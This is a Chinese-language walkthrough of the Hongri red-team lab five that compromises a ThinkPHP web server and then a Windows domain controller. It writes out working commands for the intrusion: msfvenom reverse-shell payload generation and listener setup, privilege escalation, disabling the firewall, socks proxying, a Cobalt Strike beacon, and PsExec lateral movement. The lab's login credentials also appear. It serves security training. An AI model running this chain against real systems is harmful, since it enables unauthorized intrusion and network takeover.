ATT&CK红队评估(红日靶场五)
字数 1329 2025-08-12 11:34:19
ATT&CK红队评估(红日靶场五)渗透测试教学文档
靶场环境搭建
靶场组成
- 两台主机:
- DC (Windows Server 2008) - 域控制器
- WIN7 (Windows 7) - 双网卡主机
- 攻击机:Kali Linux
网络配置
- WIN7主机:
- 内网网卡IP:192.168.138.136
- 外网网卡IP:192.168.135.150
- WIN2008 (DC):
- 内网IP:192.168.138.138
- Kali攻击机:
- 应与WIN7外网网卡同网段(192.168.135.0/24)
- NAT模式
登录凭证
- WIN7:
- 本地用户:sun\heart 123.com
- 管理员:sun\Administrator dc123.com
- 域控:
- sun\admin 2020.com
渗透测试流程
1. 信息收集与初始访问
-
端口扫描:
nmap -sS -p 1-65535 -A 192.168.135.150- 发现开放80端口(ThinkPHP)和3306端口(MySQL)
-
利用ThinkPHP漏洞:
- ThinkPHP 5.0存在远程代码执行漏洞
- 使用工具验证:ThinkphpGUI
- 获取Webshell后使用蚁剑连接
2. 建立持久访问
- 生成并上传Meterpreter木马:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.135.136 LPORT=5555 -f exe > shell.exe - MSF设置监听:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.135.136 set LPORT 5555 exploit - 通过蚁剑终端执行shell.exe获取会话
3. 权限提升与持久化
- 提权:
getsystem - 进程迁移:
ps # 查看进程 migrate <PID> # 迁移到稳定进程 - 关闭防火墙:
NetSh Advfirewall set allprofiles state off
4. 内网渗透
-
内网信息收集:
ipconfig /all- 发现内网网段:192.168.138.0/24
- 域名:sun.com
-
添加路由:
route add 192.168.138.0 255.255.255.0 2 -
建立代理:
use auxiliary/server/socks_proxy set SRVHOST 127.0.0.1 set VERSION 4a exploit- 编辑/etc/proxychains4.conf添加socks代理
-
使用Cobalt Strike:
- 建立监听器
- 生成并上传CS木马
- 提权后设置睡眠时间为0
- 使用
net view查看域和计算机列表
5. 横向移动
-
使用fscan扫描内网:
- 发现域控(192.168.138.138)开放445,139,88,135端口
-
使用PsExec横向移动:
- 在CS中新建beacon_smb监听器
- 通过psexec拿下域控主机
关键工具与技术
-
漏洞利用工具:
- ThinkphpGUI (针对ThinkPHP 5.0 RCE)
- Metasploit Framework (生成payload和监听)
- Cobalt Strike (高级内网渗透)
-
信息收集工具:
- Nmap (端口扫描)
- fscan (内网扫描)
-
横向移动技术:
- PsExec (通过SMB协议执行命令)
- Mimikatz (凭证获取)
-
代理技术:
- MSF socks_proxy模块
- Proxychains配置
注意事项
- 在实际渗透中,关闭防火墙等操作可能会触发安全警报
- 进程迁移应选择稳定的系统进程(如explorer.exe)
- 横向移动前应充分收集目标信息,避免盲目攻击
- 使用代理时注意配置正确,确保流量能正确路由
- 域渗透中,优先获取域管理员凭证可大幅简化后续操作
总结
本渗透测试从外网Web应用漏洞入手,通过ThinkPHP RCE获取初始立足点,建立持久访问后向内网扩展,最终通过PsExec技术拿下域控主机。整个过程涵盖了外网渗透、内网横向移动、权限提升和域渗透等红队评估关键环节。